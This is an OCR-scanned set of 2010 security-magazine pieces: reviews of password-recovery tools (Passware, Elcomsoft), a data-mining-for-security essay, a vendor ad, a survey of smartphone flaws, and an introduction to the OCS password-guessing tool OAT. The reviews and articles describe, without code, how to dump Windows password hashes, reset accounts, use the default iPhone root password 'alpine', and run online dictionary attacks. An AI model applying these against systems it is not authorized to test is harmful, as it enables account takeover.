year of updates, after 
which it is $195 peryear 
Tested on: Gateway 
Laptop Pentium M 
1.73Ghz 1GB Ram, 
Windows XP SP2 



Passware Kit Forensic 9.5 



Passware Kit Forensic is described 
as the complete forensic discovery 
solution, and able to find all 
password protected files on a machine and 
start to even BitLocker. With over 180 different 
file types covered for password recovery, 
version 9.5 now also offers BitLocker decryption 
and recovery of PGP archives and virtual disks. 

1st Test 

First thing was to run a scan on my machine to 
see what it could find. 86GB total space with 55GB 
of it in use. 1 74,783 files on there with 1 22 files that 
are protected. It only took 60 minutes to complete 
this scan (which isntthe 4,000 per minute, which 
an average pc can achieve according to the 
website, actual speed 2916 files per minute). 

Once the scan was completed you are 
provided the following: Filename, Folder 
location, Recovery options, File Type, Document 
Type (program version), Protection Flags, Date 
Modified, File Size, MD5 of the file. 

You are also given a complete scan log, 
which itemizes everything and the files that 
were actually skipped. 

The recovery options column provides details 
on what the actual recovery process would be for 
that particular file. By clicking on the actual file, you 
are provided the option in the left hand column to 
start the recovery process. Once you click on this 
option, you are then provided with three further 
options of Running a Wizard, Use Predefined 
Settings (use default settings) or Advanced 
where you can specify customized settings 
purely for this file. By starting the Wizard you are 
requested to try and provide any information that 
you may have concerning the password itself. By 
selecting Advanced, you can tailor the attack for 
this file using the available options. Basic Attacks 
- Dictionary, Xieve, Brute Force, Known Password/ 
Part, Previous Passwords 

Modifiers - Change Casing, Reverse 
Password, Combine Attacks - Join Attacks, 
Append Attacks Whilst attacks are running, you 
are given an estimated time for decryption, 
ranging from months to minutes. 

2nd Test 

You are given the option to create a portable 
version for those times when you can't install 
anything to a machine. This creates all the 



necessary files into a folder that you have 
specified. You can then copy this folder to a 
usb stick, or burn it to a cd/dvd. 

Once it was transferred onto the usb stick, 
tried the scanning process on my laptop again, 
and I did notice that the scanning was noticeably 
slower this time round. But I still think this is an 
excellent feature, and it will be staying on my utilities 
stick. There is no difference in the actual program 
between the version installed onto a hard drive and 
a version installed onto a USB stick. 

3rd Test 

You are also given the ability to create a 
bootable cd for password resetting for Windows 
2000, Windows XP and Windows Server 2003, 
as well as for Windows 7, Vista, and Server 
2008 so long as you have the respective setup 
cd for the operating system. You are given the 
opportunity to install the respective SCSI or 
RAID drivers if required at time of creation. I was 
able to reset the password for all the accounts 
that were available on my laptop, not just the 
administrator. 

Extra Information 

You are able to utilize multicore cpu's and nVidia 
GPU's to speed up the decryption process, 
(upto 3,500 times) as well as being able to use 
Tableau TCC Hardware accelerators (upto 25 
times faster). You are also given 20 credits for 
Passware's online decryption service for Microsoft 
Word and Excel documents. In demo version 
you are given a preview of the file regardless of 
the password length, and the 20 credits give 
not only a preview, but they allow to save the fully 
decrypted files. There are some limitations which 
you need to check out on the website, http:// 
www.lostpassword.com/online-mode.litm 

Every IT department should have a copy 
of this somewhere, the amount of times 
have had calls where someone has left the 
company, and the machine has been handed 
in, only for us to find that the pst file is password 
protected or there is a password protected zip 
file that could contain company information 
all you need to do is fire this tool up and very 
quickly you are likely to have access to the 
files. I think it will pay for itself the first time you 
need it, especially when you have a manager 
screaming i need the data now!! 
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Elcomsoft System 
Recover/ 



'V k ||l ElcomSoft System Recovery 
will allow you to reset account 
passwords Instantly as well as 
giving you the ability to launch an attack 
on the original passwords. You are able 
to unlock an locked accounts, disabled 
accounts from a normal user upto 
administrator level for all these operating 
systems; Windows NT, Windows 2000, 
Windows XP, Windows Vista, Windows 2003 
Server, Windows 2008 Server 

By providing the installion on a pre-licenced 
Windows PE environment, it couldnt be easier 
to use. You can either burn the image to a cd 
or create a bootable usb stick. Unlike most 
password recovery solutions, this is a Windows 
GUI type platform, making it more familiar to 
most IT users. 

There are three versions available of the 
product, Basic, Standard and Professional. 
Only the professional one is licenced for actua 
business use. For a comparison of the three 
different versions, please take a look on 
http://www.elcomsoft.com/forgoLwindows_ 
logon_password.html#chart 

Elcomsoft System Recovery includes built- 
in drivers for third-party SATA, RAID, and SCSI 
adapters from the most popular manufacturers 
including Intel, NVIDIA, VIA, SiS, Adaptec, 
Promise, and LSI. For most PCs, there is no 
need to trawl the Internet for the latest drivers 
they should already be available on the boot 
disk. 

Once booted up into the Windows 
environment, you are asked to select which 
installation you wish to try and recover the 
passwords for. Once connected to the 




Windows system, you will see all the accounts 
that you are able to edit and make changes 
to. As I was testing this on my local laptop, 
was presented with each of the accounts, and 
by clicking on each of the accounts I am able 
to reset the password if I wish to do so, and 
even escalate the privileges of a normal user 
account. 

Elcomsoft System Recovery allows you 
to backup the Windows Registry or Active 
Directory database onto an external drive 
for later analysis. You can also dump the 
password hashes from SAM/SYSTEM files or 
from the Active Directory database, and the 
write them to a text file for further analysis and 
password recovery. You can get a list of all user 
accounts (local or from the Active Directory 
database) and their properties, including 
Administrator accounts. 

h the wrong hands this tool could be 
very dangerous as all someone would need 
is to have physical access to your server for 
approximately 1 0 minutes and they would be 
able to dump every single user account off 
one of your servers, this proves that the old 
phrase of, if they have physical access then 
the machine is theirs. On the support side of 
things this tool is useful, but if you need to have 
physical access to the machine then this could 
cause issues if the IT support department is 
in one part of the country, and the effected 
system is elsewhere. 

All in all a good useful tool to have 
available. 





URL: http:// 

www.elcomsoft.com/ 

esr.htm 

Price: 

Basic: €49 
Standard: €199 
Professional: €399 
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Difficulty 



WHAT YOU WILL 
LEARN... 

Basic security terminology 

WHAT SHOULD YOU 
KNOW... 

The basics of data mining 

Where the data comes from 

How data mining is used for 
security 



Data Mining 
as a Tool for 
Security 



Given the current state of heightened security across the 
globe today, the ability to sift through data and search for key 
information and the occurrence of particular patterns is highly 
desirable. 



This capability, known as data mining, can 
be used to pinpoint anything from seasona 
grocery purchasing habits of individuals to 
the pattern of international telephone calls that 
might presage an act of terrorism. 

Data mining, simply, is a process that allows 
large volumes of data to be searched for patterns 
and relationships in or among sets of data. 

Goals of Data Mining 

Data mining is performed with the return of 
particular information in mind. In a general sense, 
the ends to the means of data mining are broken 
into four main categories: 

Prediction 

Data mining can be used in an attempt to predict 
how certain variables in the data set will behave 
in the future. This type of analysis is often used in 
intrusion detection systems. Being able to predict 
what network traffic will look like on a particular 
day or at a particular time of day allows security 
personnel to focus their efforts on the specific 
areas where unusual activity is noted. 

Discovery 

Patterns within mined data can be used to 
identify the existence of a given item, event, 
or activity. In a general sense, password 
authentication fits within this category. Password 
authentication determines whether a user 
is actually a specific user by comparing the 



attributes that the user presents against the 
stored attributes held in a database. 

Classification 

Mined data can be partitioned in order to identify 
classes or categories based on combinations 
of parameters. Such methods are often used 
to segment network traffic into 'good' and 'bad' 
based on a the contents of a particular packet, 
as is done in simple packet filtering, or on the 
contents of a packet in context with other traffic, in 
order to detect more complex behavior such as IP 
fragmentation attacks. 

Optimization 

Data mining can be used in an effort to optimize 
the use of resources in a variety of projects. An 
excellent example of data mining used for this 
purpose is that of estimating software guality. 
The task of predicting software faults can be truly 
daunting, but with data mining technigues and 
information gathered from a variety of software 
metrics gathering methods, such faults can be 
accurately predicted [1]. 

Types of Information 
Returned by Data Mining 

Data mining can be used as a sort of inductive 
reasoning, meaning that it can be used to 
discover previously unknown patterns within 
data. Four types of data can be returned by data 
mining: 
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DATA MINING AS A TOOL FOR SECURITY 



Association Rules 

Association rules can be used to 
correlate the presence of a set of items 
with another range of values for another 
set of variables. Association rules are 
particularly useful when attempting to 
detect unauthorized activity based on log 
files. While some events, like the update 
of a critical system file, may be expected 
when applying a patch or an update, the 
same file being updated in the absence 
of maintenance activity may be an 
indicator of an attack. 

Classification Hierarchies 

Classification hierarchies work from 
existing sets of events or transactions 
to create a hierarchy of classes. One 
interesting use of this system is present 
in the Computer Aided Facial Image 
Inference and Retrieval System (CAFIIR) 
[2]. CAFIIR is a tool that assists witnesses 
in identifying suspects from photographs. 
A classification hierarchy used to allow 
the photographs to be ordered by facia 
features in order more easily identify 
individuals. 

Sequential Patterns 

Seguential patterns are patterns where 
a seguence of events or actions typically 
happens in a specific order. A motorist 
with a flat tire will likely follow a seguence 
similar to the following: 

Pull over to the side of the road 
Exit the vehicle 
Examine the tire 
Open the trunk 
Retrieve the spare tire 

This seguence of events is unlikely 
to occur in a different order. When 
such patterns are discovered, 
accurate predictions can generally be 
made regarding future occurrences 
from any point in the seguence. 
Seguential pattern analysis is used 
when examining communications 
traffic for signs of impending terrorist 
attacks and has been found to be a 
reliable indicator of such activity, even 
clearly indicating past attacks where 
communications logs were available for 
analysis afterward. 



Periodicity 

Time series data examines the change 
of data values over a period of time. 
Periodicity is used to help predict the 
behavior of time series data. A very 
common use for this sort of data is found 
in tracking the behavior of malware. 
Data mining, based on time series data, 
can be used to assist in predicting the 
occurrence and behavior of malware, 
and to model it as it spreads. 

Clustering 

A population of events or items can be 
partitioned into sets of similar events. 
One example is found in a subset 
of clustering, known as document 
clustering. Document clustering, used 
heavily in information retrieval, text 
mining, databases, and many other 
fields, involves grouping similar or 
related documents together. This allows 
documents to be more easily searched 
by related topics and greatly speeds 
the effort of searching for particular 
information. 

Where Does 

the Data Come From? 

The supply of fodder for data mining can 
come from a variety of sources, as nearly 
every move made in the modern world 
has an associated record of some sort. 
Even when deliberately attempting to 
minimize the production of such records, 
individuals are still registered in multiple 
systems daily unless the have dropped 
completely off of the grid. Taking privacy 
measures to this extent is untenable to 
most people. 

Purchase Records 

Purchase records are a very rich source 
of data for data mining purposes. Making 
a very data-rich situation even richer is the 
trend in the last few years toward loyalty 
cards or membership cards. These cards, 
in place in many large retail chains and 
grocery stores, give discounts to customer 
while allowing the retailer to track the 
customers purchase history at an even 
more granular level. This data can be 
used to create a profile on customers over 
a period of time, becoming more accurate 
with each purchase [3]. 



Travel Records 

When traveling by car, it is possible to 
track the route by purchase patterns. 
If only cash is used for gas purchases 
and a cell phone is not used then an 
individual can travel freely without being 
tracked. When traveling by air, however, 
data is always generated regarding time 
of departure, destination, and length of 
stay. This information was reguested from 
the airlines by the government recently in 
an attempt to track terrorists. 

Insurance Records 

Insurance companies make a business 
out of risk management. For these 
companies to be profitable they must 
take in more money in the form of 
premiums than they pay out in claims. 
Insurance companies base premium 
pricing on the level of risk and that risk 
can be computed more accurately if 
more information is known about the 
potential customer. Gerver and Barrett 
point out that Plan sponsors can reduce 
or avoid future health care costs by at 
least 5% or 10% annually through the 
use of evidence-based data mining 
technology [4]. Customers are reguired 
to fill out applications for insurance 
and in doing so provide obvious data 
such as name, address and so on. This 
information can be used with data mining 
technigues to gather other information 
about a potential customer such as the 
sports that they engage in or medica 
ailments they might have. 

Communications Records 

Communications are another very rich 
source of information to be mined. The 
US National Security Agency (NSA) 
began collecting and mining phone call 
records since shortly after the September 
11th terrorist attacks on the world trade 
center. These records are examined for 
particular patterns of calls coming into 
and going out of the country, a possible 
indicator of terrorist activity [5]. 

A bill recently introduced to the US 
House of Representatives would reguire 
Internet Service Providers (ISPs) to keep 
records of user's internet usage, including 
web browsing, Instant Messenger (I M) 
conversations, and email, potentially 
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indefinitely [6]. Such a massive store of 
data would enable data mining on a scale 
that would make current efforts pale in 
comparison. 

Most web site visits are tracked. 
Through the use of cookies, it is possible 
to track individuals across multiple 
sites. Advertizing companies such as 
DoubleClick (now owned by Google) make 
a business of tracking web site visits by 
individuals. 

Credit History 

In the 1960s, automated credit scoring 
came into use. This allowed the 
consumers credit data to be mined in 
order to create an overall 'score' of the 
customer's credit worthiness. 

One of the most commonly known 
sources of personal information in the 
United States is the data housed by the 
credit bureaus. The main credit bureaus 
in the US are Eguifax, Experian, and 
TransUnion. The credit bureaus keep data 
on all of our credit activities. This includes 
home mortgages, car and student loans 
and all of our credit card payment activity. 
Credit reports on individuals are trivially 
easy to obtain and can be purchased on 
the internet for a small fee. 

Medical Records 

A patient's medical information can be 
legally mined by insurance companies, 
doctors, hospitals, and other related 
ndustries. This information, containing 
everything from clinic visits to information 
on surgeries, provides a vast wealth of 
information. This is one of the few areas 
in most countries where the patient's 
private data is offered some sort of legal 
protection. 

Government Records 

In the United States, the FBI has been 
building a national DNA database since 
1 990. According to data on the FBI's web 
site, the database contained 7,261,604 
profiles as of September 2009 [7], Under 
the DNA Identification Act of 1994, the FBI 
was authorized to create a national DNA 
database for law enforcement purposes. 
Local and state police contribute data 
from criminals to this database. Its 
purpose is to enable DNA evidence at 



crime scenes to be matched guickly 
to a person. At the present time only 
convicted criminals are forced to provide 
DNA samples. There is no law that forces 
suspects to contribute their DNA but 
such a law is possibly coming. If passed, 
anyone taken into custody might be 
reguired to provide a DNA sample. 

In the United Kingdom, the UK National 
Criminal Intelligence Database (NDNAD) 
has been constructed, against which the 
FBI's database pales in comparison. The 
UK collects DNA from samples at crime 
scenes, anyone detained at a police 
station (charged or otherwise), anyone 
participating in a recordable offense, 
anyone convicted of certain crimes before 
the establishment of the database, and 
the deceased. DNA samples can legally 
be collected with or without the consent of 
the individual, by force if necessary [8], As 
of March of 2009 the NDNAD contained 
5,208,988 profiles [9], with the UK at a 
population nearly 1/5 that of the United 
States. 

Data Mining for Security 

With such a rich set of data to work from, 
data mining is freguently performed in the 
name of security. These uses range from 
security efforts regarding individuals, to 
the internal functions of network security 
devices. 

Casinos 

Casinos make money based on 
computed odds. If a customer can find 
a way to tip the odds in their favor they 
stand to make substantial gains. Jeff 
Jonas founded Systems Research & 
Development (SRD) to help businesses 
solve difficult problems using data mining 
technigues. Ouite a bit of Jonas' early 
work was spent helping hospitals identify 
patients who were trying to avoid payment 
by slightly changing the name under which 
they registered [10], 

Casinos use SRD's products to 
match lists of people taken from multiple 
sources against anyone who applies for 
a job or is currently or was previously 
employed by the casino. By using Jonas' 
matching algorithms, the casinos can 
avoid employing people who might have 
criminal or suspicious backgrounds. 



Such systems are also used to track 
cheaters and card counters and share 
this information between different 
establishments. 

Government 

The government of the United States is 
nvesting heavily in data mining technology 
as part of its war on terror and for various 
other purposes. In 2004, the Government 
Accounting Office identified 199 separate 
government data mining operations [11]. 
A significant number of these operations 
nvolved the use of personal information. 

More recently the US government 
has employed data mining technigues 
to detect fraudulent claims after 
hurricanes Katrina and Rita [12]. Some 
of the data mining work done to detect 
fraudulent claims is similarto the work 
that Casino owners are doing in order 
to avoid employing criminals and other 
undesirables. In the case of the fraudulent 
claims, the government was particularly 
nterested in detecting multiple claims. 

Possibly the highest visibility 
government data mining operation has 
been its attempt to determine if an airline 
passenger poses a potential threat. 
The Computer-Assisted Passenger 
Prescreenlng System II (CAPPS II) used 
data mining technigues applied to large 
amounts of airline passenger information 
(obtained by the government's contractor 
with the airlines) to attempt to match 
passengers to wanted lists. This particular 
use of data mining met with considerable 
public resistance as consumers 
discovered that their personal information 
had been given to the government for 
testing of this system, and was dismantled 
by president Bush. CAPPS II is now slated 
to be replaced by the Secure Flight 
system in 2010, a system that shares a 
great many similarities, both positive and 
negative. 

Background Checks 

Despite the detail an applicant might 
provide in a resume, a potential employer 
would be remiss if they did not investigate 
candidates more thoroughly. By using 
data mining technigues, employers can 
find out a lot about a potential employee. 
The most rudimentary form of data mining 
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is to simply type the person's name into 
Google and scan through the results. 
More sophisticated technigues can 
provide a wealth of information that may 
help make a decision on the suitability of 
the candidate, and an entire industry exists 
to serve such needs. 

Network Security Appliances 
and Anti-Malware products 

As mentioned briefly earlier data mining 
provides a valuable tool for use in host 
and network security applications. Various 
technigues can be utilized in intrusion 
detection systems, firewalls, and even 
simple routers to ensure that malformed 
or malicious traffic is guickly filtered from 
the network. 

When examining intrusion detection 
systems and anti-malware products from 
a data mining standpoint, both are similar 
efforts and use similar technigues. In such 
systems, data mining efforts are generally 
categorized as either misuse detection or 
as anomaly detection. 

Misuse detection searches for 
patterns of attack based on an existing 
signature of the attack. As with most 
signature based systems, this type 
of detection is very limited, as it is not 
capable of detecting attacks for which it 
does not have a signature. 

Anomaly detection works from a 
baseline of normal behavior and looks 
for significant deviation from the baseline, 
h theory, anything deviating by a certain 
amount from the baseline should be 
considered an attack, but this method is 
prone to false positives. 

h many products, misuse detection 
and anomaly detection are used 
in combination to provide the most 
coverage. 

Software Security 

With the broad acceptance of open source 
software and the reuse of open source 
code, it becomes important to know what 
the code is actually doing. When a vendor 
ships a product based around a large 
body of code that it did not create, such as 
an open source database or web server, 
the task of validating that the code is not 
performing any malicious activity can be 
daunting, at best. Data mining technigues 
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can be used to evaluate both the code 
itself, in an attempt to locate programming 
technigues that indicate poor or lacking 
security, or can be used to look for actua 
malicious segments of code. Severa 
commercial tools exist that can perform 
these types of functions. 

Privacy Issues 

A great deal of data mining is based on 
databases of personal information such 
as purchases made at stores, travel plans, 
hobbies and medical records. 

Who should have access to a person's 
personal information? How much persona 
information should they have access to? 
The medical and legal professions deal with 
client confidentiality all the time because 
doctors and lawyers are privy to personal 
information that they need to know in order 
to perform a service on the behalf of the 
patient. In the modern world, much of this 
information is held in digital form allowing it 
to be easily read, edited, copied and sent to 
third parties. If such data is held in a shared 
database, is it possible to ensure that 
someone other than an authorized doctor or 
lawyer does not have a way to read it? 

Along with the confidentiality of personal 
data lies its integrity. Obviously it is not 
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desirable to allow just anyone to read 
private medical records and it is certainly 
important to prevent anyone from being 
able to alter these records other than to 
add legitimate new material. Assuring the 
integrity of personal data is difficult because 
individuals are generally not the holder of 
the information. Such data is held on behalf 
of individuals by credit rating companies, 
banks, doctors, lawyers and others. 

Accuracy of Data 

The accuracy of personal data stored by 
any organization can be of considerable 
importance to the individual. 

Probably the best known problem in the 
US is incorrect data in an individual's credit 
report caused by something as trivial as 
a data entry error caused by a bounced 
check or other problem that is attributed to 
the wrong person. Even though that data is 
incorrect, proving that it is so and getting 
it amended becomes the responsibility of 
the affected individual. Families with severa 
living persons having the same name are 
also prone to inaccurate credit reporting 
because data gets associated with the 
wrong family member. 

The US government's recent 
attempts to locate terrorists by inspecting 



airline manifests and so on rely on 
having accurate data. If an individual is 
unfortunate enough to have a name or 
address similar to a known terrorist they 
might find themselves denied access to a 
flight. The data is inaccurate - the person 
is not a terrorist, yet the data available to 
the security officials indicates that they are. 

Transcription of hand-written data to 
computerized form is prone to errors. 
Consider that many patient records created 
by personal doctors or those doctors 
working in hospitals are often written by 
hand. When these are transcribed to a 
digital form, small errors in the data could 
have several outcomes including: 

Being billed for the treatment of 
another patient 

Being issued the incorrect medication 
or dosage 

Undergoing the wrong procedure 
entirely 

These types of errors in medical data can 
be unpleasant at the very least, if not fatal. 

Conclusion 

The ability of modern computer systems to 
efficiently sift through very large amounts 
of data guickly has enabled the use of 
data mining in a wide variety of application 
domains. Data mining is now used to identify 
potential terrorists and other criminals, 
project sales patterns in retail stores and 
predict the course of the weather An 
enormous amount of data is now available 
regarding businesses and individuals and 
this volume of information is increasing at an 
amazingly fast pace. By using data mining 
to gather information from multiple disparate 
sources, it is possible to correlate what is 
apparently unrelated data and to come to 
significant conclusions in near real-time. 
Data mining currently plays an increasingly 
important role in security, business and our 
personal lives, and will continue to do so for 
the foreseeable future. 
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per cent of users forget their password 
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Password Recovery Bundle is a complete suite 
of ElcomSoft password recovery tools allows 
corporate and government customers to unpro- 
tect disks and systems and decrypt files and 
documents protected with popular applications. 
Based on in-house tests as well as feedback from 
ElcomSoft valuable customers, these password 
recovery tools are the fastest on the market, the 
easiest to use and the least expensive. 
- Hardware-accelerated brute-force attack 
based on NVIDIA CUDA; multi-CPU and rnulti- 
GPU support. 



- The password cache automatically stores all 
discovered passwords in order to unlock other 
documents protected with the same password 
momentarily. 

- Dictionary attack can quickly recover the majority 
of passwords used by general computer users, and 
up to 40 per cent of passwords employed in 
corporate environments. 

- Supports over 100 file formats, including MS 
Office, Adobe PDF, Windows logon passwords, 
ODF, PGP disks, UNIX/Oracle user passwords, 
WPA/WPA2, Intuit Quicken, and much more. 



«When auditing my clients networks and applications for 
weak, passwords, I require a tool set that is dependable 
and fast. From time to time, I'll also receive a request to 
recover a lost password protecting a critical document or 
spreadsheet. Elcomsoft has delivered the desired results 
each and every time! I want to thank Elcomsoft for 
providing the best password auditing and recovery tools 
on the market." 

Kevin Mitnick 




77 per cent of users use the same 
password to protect various types of data 




http://elcomsoft.com/eprb.html 
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Difficulty 



WHAT YOU WILL 
LEARN... 

Gain an overview of recent 
attacks on smartphones 

WHAT SHOULD YOU 
KNOW... 

Basic understanding of 
smartphones. 



Movement on 
the Mobile 
Exploit Front 



It did not take an industry expert to verify predictions of an ever- 
increasing amount of vulnerabilities in device software: Nokia's 
Curse of Silence issue should have convinced even the most 
stubborn of do-gooders. 



This article provides you with a short list of 
problems which have occurred recently and 
should give you a preview of things you can 
look forward to. 

But Nobody Uses a Console to 
Access Bluetooth FTP 

Our first vulnerability is related to Windows 
Mobile. Or rather specifically to HTOs Windows 
Mobile devices and their BT-FTP service. This 
Chinese manufacturer has the habit of enhancing 
Microsoft's rather crappy Bluetooth Stack with an 
application to handle an additional service called 
Bluetooth FTP (see Figure 1). 

BT FTP allows other Bluetooth devices to 
access/modify parts of the local filesystem 
(usually a subfolder of the My Documents 
folder) of the device offering the service as if the 
device was offering an FTP server (see 
Figure 2). 

Good-mannered clients understand which 
folder is considered the root one, and do not 
allow users to traverse above it. Unfortunately a 
Spanish hacker Moreno Tablado, used a termina 
connection on a Linux box to try just that - and 
got access to the device's root directory (and, 
incidentally also the /windows/ folder containing 
important system files). 

Individuals with little more than a basic 
understanding of Windows Mobile can then 
attack the handset using this little jailbreak. 
The possibilities are endless and range from 



mundane things like accessing private files to 
outright devious things like installing a program 
which calls 0900 numbers and generates 
revenue for the attacker 

The only reason why this issue did not 
become more significant was that access to BT 
FTP was limited to paired devices: if users are 
careful with whom they pair their phones, they are 
safe. 

Carelessness is not limited to HTG This 
Black Hat conference saw the unveiling of yet 
another large-scale vulnerability which affected 
handsets running different operating systems and 

- incidentally - was discovered by fuzzing. 

h particular it is related to so-called over 
the air (OTA) provisioning. OTA provisioning is a 
technology which is applied mainly when it comes 
to configuring handsets: if somebody wants to use 
an unlocked/unbranded handset on a carrier's 
network, the carrier can deploy the necessary 
settings for things like access point network (APNs) 
via special short message service (SMS) which get 
processed by the handset. 

On Android, Apple IOS and Windows 
Mobile, vulnerabilities were discovered (but not 
disclosed as many of them were unpatched as 
of the presentation). As of now, all these do is 
cause DOS conditions on the victim's handset 

- however, at least some of the vulnerabilities 
definitely have the potential to allow for the 
execution of random executables downloaded 
from the network without user intervention. 
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MOVEMENT ON THE MOBILE EXPLOIT FRONT 



Fools and root rights 

The final issue which deserves coverage 
in this smorgasbord of topics is the 
recently-emerged variety of iPhone 
worms. 

Users who wish to use pirated 
software or tether for free must jailbreak 
their device, and often happen to 
set up an SSH server in the process. 
Unfortunately the creator of the SSH 



package forgot to force users to change 
the default root password (which, 
incidentally, is alpine) - which has graced 
us with literally thousands of always-on 
devices which can be rooted by anyone 
who happens to know the IP address. 

Various black-hat hackers have since 
taken to port scanning a carrier's network, 
and then attacking vulnerable devices. 
So far, all we have seen is nagware and 



Applications 


HTC BT FTP 


Microsoft's Bluetooth stack 



Figure 1. The BT FTP service sits on top of the ' 



' bluetooth stack 
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Figure 2. Using Resco Explorer on a Palm OS device to access a Windows Mobile 
box (image from http://tamspalm.tamoggemon.com) 



changed display backgrounds - but in 
my humble opinion it is but a guestion 
of time until more dangerous things will 
pop up. 

Conclusion 

All of the exploits and security issues 
mentioned in this article are due to 
plain carelessness on the responsible 
programmer's end. Had they been aware 
of the most basic elements of security, 
these would have never happened. 

Unfortunately, developers working for 
carriers and device manufacturers still 
see security as an afterthought. Their 
thinking goes along the lines of nobody 
bothered to perform large-scale attacks 
on us so far, so why should they do so 
now? 

Pairing this attitude with a total lack of 
security-related training opens up a potential 
minefield as smartphone platforms get 
more and more popular Folks: expect more 
casualties from this front soon. . . 

Further Reading 

http://www.seguridadmobife.com/ 

windows-mobile/windows-mobile- 

security/HTC-Windows-Mobile-OBEX- 

FTP-Service-Directory-Traversal.html 

http://www.blackhat.com/ 

presentations/bh-usa-09/MILLER/ 

BHUSA09-Miller-FuzzlngPhone- 

SLIDES.pdf 

http://www.blackhat.com/ 
presentations/bh-usa-09/LACKEY/ 
BHUSA09-Lackey-AttackingSMS- 
SLIDES.pdf 
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Difficulty 



WHAT YOU WILL 
LEARN... 

At the end of this article users 
will be able to successfully 
assess the security posture of 
their OCS 

WHAT SHOULD YOU 
KNOW... 

Reader is expected to be 
a user of Microsoft Office 
Communication Server and 
familiar with its features 



Assessing Microsoft 
Office Communication 
Server R1 /R2 with OAT 



The mantra of any good security engineer is: 'Security is not 
a product, but a process.' It's more than designing strong 
cryptography into a system; it's designing the entire system such 
that all security measures, including cryptography, work together. 
- Bruce Schneier 



Continuous education and awareness 
about advantages of penetration testing 
and vulnerability assessment services, 
has led enterprises finally allocate yearly budgets 
for their security audits. However these security 
audits are limited to only enterprise data networks, 
which leaves Voice over IP (VoIP) networks, 
unsecure. 

Looking at the benefits like lower phone bills, 
virtual offices, centralized management and rapid 
deployment, many enterprises have already adopted 
Unified Communication (UC) infrastructures. 

With the advent of new technologies, 
VoIP introduces new security risks and new 
opportunities for attack. Inheriting from both 



networks and telephony, VoIP is subject to security 
issues arising from both areas which need to be 
addressed. 

This article elucidates the need of vulnerability 
assessment in UC Infrastructure along with 
an introduction to a unigue, first of its kind, free 
security assessment tool for Microsoft Office 
Communication Server (OCS). 

Pre-requisites: Readers must have a basic 
understanding of VoIP and protocols like SIP RTP etc. 

By the end of this article, readers will identify 
security risks in their OCS deployments and will 
be effectively able to audit security posture of their 
OCS deployments. Before we go any further, let's 
understand what Unified Communication is? 




Figure 1. Unified Communication - Getting acquainted with Unified Communication 



26 HAKIN9 2/2010 



OAT 



To put in plain words, Unified 
communication is the integration of rea 
time communication services such as 
instant messaging, presence information, 
IP Telephony, video conferencing etc. with 
non real time communication services 
like unified messaging. Now the guestion 
arises what exactly is unified messaging? 

Well, unified messaging is the 
assimilation of electronic messaging and 
communication media like email, SMS, 
fax, voicemail etc. into a single interface 
which can be accessible from variety of 
different devices like wireline & wireless 
phones, computer etc. 

Microsoft Office Com- 
munication Server R1/R2 

OCS is one of the cornerstones of 
Microsoft's revolutionary software 
based UC solution and is the platform 
for presence, instant messaging, 
conferencing, and enterprise voice for 
businesses around the world. 

OCS helps to streamline 
communications between people and 
organizations. It brings together e-mail, 
calendaring, voice mail, IM, presence, 
VoIP audio, video, and Web conferencing. 
OCS also allows IT administrators to 
effectively meet challenges like cost control, 
integration with existing infrastructure, and 
compliance reguirements. 

Considering the benefits provided by 
OCS, companies like Intel, Shell, Credit 
Agricole, Lionbridge and others, have 
already deployed MS UC solution. Microsoft 
being the big fish has always been subject 
to analysis and scrutiny of its products by 
security professionals and crackers. 

Over the years, they discovered 
loopholes and succeeded in exploiting 
them, however what strikes is, how could 
they spare OCS? 

Well, researchers tried to apply 
all documented VoIP attacks like 
- eavesdropping, protocol flooding 
using protos suite, call hijack attacks, call 
teardown along with media manipulations 
attacks against OCS but their attempts 
failed as Microsoft entered the UC market 
with a solid preparation & groundwork: 

SIP protocol stack is very stealthily 
used against fuzzing 



Properly guarded with NTLM 




Use of proprietary media codecs 


and Kerberos Authentication 




helped Microsoft against some 
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Figure 2. Office Communication Server - Manifold Roles of OCS 
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Figure 3. OAT Splash Screen 
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Figure 4. OAT at External Network Attack Mode 
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Use of signatures in every transported 
sip message helped them to avoid 
message tempering 
On top of that it runs over TLS. 

Pretty foolproof! Huh? When I started 
analyzing OCS, I found out there was not 
even a single tool available for assessing MS 
OCS server It instigated me to delve into this 



and I initiated taking a look at Microsoft OCS 
security. I attempted to reverse engineer the 
OCS client and came up with my own striped 
down version of the OCS communicator 
client, way before the release of using UC 
SDK. 

wrote a small proof of concept 
(PoC) using the Win32 API to authenticate 
legitimate OCS user with OCS server without 



fi OAT »2.0 



OAT Home | Common Attack Setting | Orkva Dtetion*v Attack | Internal Attacks | External Attacks | Cai DoS | Attack Report ] OAT License 1 

Sipera VIPER Lab 

OAT is an open source security tool designed to check the password strength of Microsoft Office Communication 
Server users. After cracking the password, OAT demonstrates various other UC/VolP attacks like Presence Steeling, 
Sparnming, Call Walking and Call DoS, 

VIPER Lab created OAT because OCS and other Microsoft products are frequently being used as part of a unified 
communications infrastructure in many enterprises. Our mission is to help IT manager and security practitioners 
evaluate the security architecture of their deployments and ensure that their mission-critical communications and 
systems are protected. 

Currently there are no public tools to authenticate Valid SIP users in OCS server 2007 R1/R2 and carry out security 
tests. OAT is helpful for demonstrating proof of concept attacks against OCS SIP infrastructure and users. 

OAT supports both NTLM and Kertieros authentication in the SIP protocol. The toot tries to register to the OCS server 
with a valid SIP usemame and a combination of passwords from the supplied dictionary file. OAT computes the 
response signature needed by the OCS server to verify authentic SIP user credentials. 

OAT is a different kind of password cracker. It works online, trying to break NTLM/Kerberos SIP by simply attempting 
to login as a legitimate user. OAT in Online made imitates a real outside attack and thus serves as a valuable security 
auditing tool. 



Following are the features supported in OAT. 

1) Online Dictionary Attack 
3) Single User Flood Mode 
5) call walking 
7) Reports 

whets New in v2.0 

1) Auto negotiation authentication protocol. 
3) "Call DoS" Attack feature 
5) Targeted Attacks 



2) Presence Stealing of SIP Enabled users from whole Domain. 
4) Multi-user Flood Mode 
r ) Play Spam Audio 



2) TLS Support. 

4) More Organised Attack Tab pages 

5) Venoose reports 



- ■ ■ • • ■ ■ ■ ■ - ■ 



l^ignrd byVCPFRI.ib 



Figure 5. OAT: Inside Out 
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Figure 6. OAT at Internal Network Attack Mode 



using the Microsoft Communicator client 
After a while, I decided to write a tool that 
would in effect implement some attacks 
against Microsoft OCS, to test the security 
posture of its configuration. 

Living in the Information security 
age, there is no substitute to innovation. 
The initial research that went into the 
study of OCS resulted in the birth of this 
outstanding and first of its kind security 
assessment tool - OAT. OAT stands for 
OCS Assessment Tool. 

OAT is designed to check Microsoft 
Office Communication Server users 
password strength. After a password 
is compromised, OAT demonstrates 
potential UC attacks that can be 
performed by legitimate users if proper 
security controls are not in place. 

